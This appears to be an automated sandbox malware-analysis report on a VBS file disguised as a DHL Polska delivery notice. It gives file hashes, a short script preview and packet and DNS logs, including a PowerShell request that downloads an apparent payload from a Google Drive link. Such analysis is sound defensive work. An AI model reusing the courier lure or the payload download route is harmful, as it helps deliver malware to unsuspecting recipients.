            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
            Process:C:\Windows\System32\wscript.exe
            File Type:data
            Category:modified
            Size (bytes):328
            Entropy (8bit):3.1379890379152853
            Encrypted:false
            SSDEEP:6:kKfe3D9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HeqDnLNkPlE99SNxAhUe/3
            MD5:C9155294E053E835770FBA24E90053D1
            SHA1:68D97D36ECCF27FAF9BF1889DAE1E92502F05A1E
            SHA-256:112365E0D6BBE0304EF0A0E4A1D067017930A73E5F70FAB01B71687AF3D44431
            SHA-512:13396986B1A3FC44DA01C25002283FB4D9F576F7D704AF2087361E1C489DB64574E72D165D4ED97C76D1B595787DF764C580359A2C7CE0590227F9323EFE1606
            Malicious:false
            Reputation:low
            Preview:p...... ........&;.C....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):437716
            Entropy (8bit):5.955092935655626
            Encrypted:false
            SSDEEP:12288:KQLR6RWQYniM1NJkMughemEtfY9SHiY/Znu14Y:Ku68RFkMug8fg9SCC8T
            MD5:18EC6FAA93EA8961A5328358419ABA01
            SHA1:23C624B18B327BDD0BE9928E3F4ECFA091F42773
            SHA-256:56018987B14F923D217C8808EA7977922ED2D35FFDFCC1CC2AF44FF45AD307FA
            SHA-512:66FE4796D21D0D95C9B43605D5D899CBF9518F86D367C89241C00B2F3545885BA05E8C819C128960FF970A362198F3151ACF29693910A006790D4D9850C17830
            Malicious:false
            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.311882710759672
            TrID:
            • Visual Basic Script (13500/0) 100.00%
            File name:DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
            File size:24'301 bytes
            MD5:3b5b96bb9765b0c37f926296a205a2d6
            SHA1:30ba62c4b319c4950bf70b83634bc8108c50c6da
            SHA256:31a8c9d6f61346b95e41ee64547aa6160932a0f740f4a712c26b6b7f1015a588
            SHA512:06e329ddad34da47c9b7db6da0ad18c1de2f9fff9601f489afc0fc5e92a133e65281084eeac14f026ca468ceff1ff1d70b01a0042eeb81680d50edbfa51fcafb
            SSDEEP:384:tEqYZcPlL8XOzXAK6W9H/tspWpf4fETh9QI32xeyBhvRs4bXKXD:tEqD9UOzddufwQIQf7Kz
            TLSH:5CB2E67B0B031D600F72B3B6A45F4AA8B18445AAF330D7212979AED7C404E97F5D897E
            File Content Preview:..................Set Batchkommandoens = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..
            Icon Hash:68d69b8f86ab9a86
            Jul 3, 2024 08:52:18.925390005 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.925594091 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.925600052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933738947 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933775902 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933810949 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.933820963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.933855057 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934037924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934078932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934102058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934140921 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934148073 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.934295893 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.934577942 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935307026 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935334921 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935349941 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.935358047 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.935430050 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.935503960 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937400103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937448025 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.937454939 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937588930 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.937630892 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.937638998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.939439058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.939491034 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.939497948 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941654921 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941680908 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941715956 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.941725016 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.941759109 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.943769932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.943995953 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944020987 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944058895 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.944067955 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.944118977 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.948055983 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948303938 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948328018 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948350906 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948353052 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.948364973 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.948406935 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954420090 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954473019 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954489946 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954502106 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954647064 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954673052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954694986 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.954701900 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.954724073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960378885 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960408926 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960465908 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960474014 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960777998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.960819006 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.960824966 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.961590052 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.964759111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964909077 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964932919 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.964947939 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.964956045 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.965049982 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.965054989 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971201897 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971259117 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971266031 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971517086 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971546888 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971556902 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971563101 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971613884 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971652031 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.971657991 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.971688032 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.976609945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.976892948 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.976919889 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.977009058 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.977020979 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.977199078 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.977206945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.983994007 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984148979 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984179020 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984206915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984231949 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984263897 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.984275103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.984298944 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.988969088 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989160061 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989187002 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989214897 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989238024 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989249945 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.989276886 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989295006 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.989300013 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996074915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996191978 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996217966 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996279955 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996289968 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996316910 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996489048 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.996527910 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.996535063 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.999908924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000104904 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000135899 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000169992 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000195980 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000255108 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.000255108 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.000283957 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.000339985 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003479958 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003520012 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003577948 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003587008 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003690958 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003731966 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003739119 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.003778934 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.003925085 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.010749102 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.010818958 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.010828018 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011029959 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011061907 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011080027 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.011087894 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.011208057 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.011214972 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013864994 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013894081 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.013921022 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.013927937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014127970 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014151096 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.014156103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014168978 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.014198065 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022300005 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022335052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022409916 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022418022 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022707939 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022733927 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022756100 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.022763014 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.022778034 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.023885965 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.023940086 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.023947954 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024126053 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024355888 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024379969 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024403095 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.024410009 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.024430037 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028143883 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028237104 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028284073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028291941 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028448105 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028476000 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028496981 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.028505087 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.028515100 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032351971 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032537937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032565117 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032594919 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032596111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032609940 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.032622099 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032646894 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.032864094 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.036936998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037017107 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037066936 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.037075996 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.037167072 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.037214041 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043028116 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043078899 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043087959 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043138027 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043200016 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043207884 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043570042 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043602943 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043622971 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.043629885 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.043709040 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053483963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053582907 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053652048 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053661108 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053807974 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053834915 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053852081 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.053858995 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.053925991 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.059819937 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.059865952 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.059953928 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.059962034 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060152054 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060175896 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060195923 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.060203075 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.060266018 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065293074 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065403938 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065450907 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065459013 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065646887 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065665007 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065690994 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065696955 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065803051 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.065907001 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.065965891 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:19.066010952 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:19.066101074 CEST49739443192.168.2.4142.250.186.161
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jul 3, 2024 08:52:16.274894953 CEST | 56861 | 53 | 192.168.2.4 | 1.1.1.1
            Jul 3, 2024 08:52:16.282908916 CEST | 53 | 56861 | 1.1.1.1 | 192.168.2.4
            Jul 3, 2024 08:52:17.313281059 CEST | 53844 | 53 | 192.168.2.4 | 1.1.1.1
            Jul 3, 2024 08:52:17.320781946 CEST | 53 | 53844 | 1.1.1.1 | 192.168.2.4
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Jul 3, 2024 08:52:16.274894953 CEST | 192.168.2.4 | 1.1.1.1 | 0xab56 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
            Jul 3, 2024 08:52:17.313281059 CEST | 192.168.2.4 | 1.1.1.1 | 0x1393 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Jul 3, 2024 08:52:16.282908916 CEST | 1.1.1.1 | 192.168.2.4 | 0xab56 | No error (0) | drive.google.com | (none) | 142.250.185.174 | A (IP address) | IN (0x0001) | false
            Jul 3, 2024 08:52:17.320781946 CEST | 1.1.1.1 | 192.168.2.4 | 0x1393 | No error (0) | drive.usercontent.google.com | (none) | 142.250.186.161 | A (IP address) | IN (0x0001) | false
            • drive.google.com
            • drive.usercontent.google.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.4 | 49738 | 142.250.185.174 | 443 | 8096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-03 06:52:16 UTC | 215 | OUT | GET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-07-03 06:52:17 UTC | 1598 | IN | HTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Wed, 03 Jul 2024 06:52:17 GMT
            Location: https://drive.usercontent.google.com/download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download
            Strict-Transport-Security: max-age=31536000
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
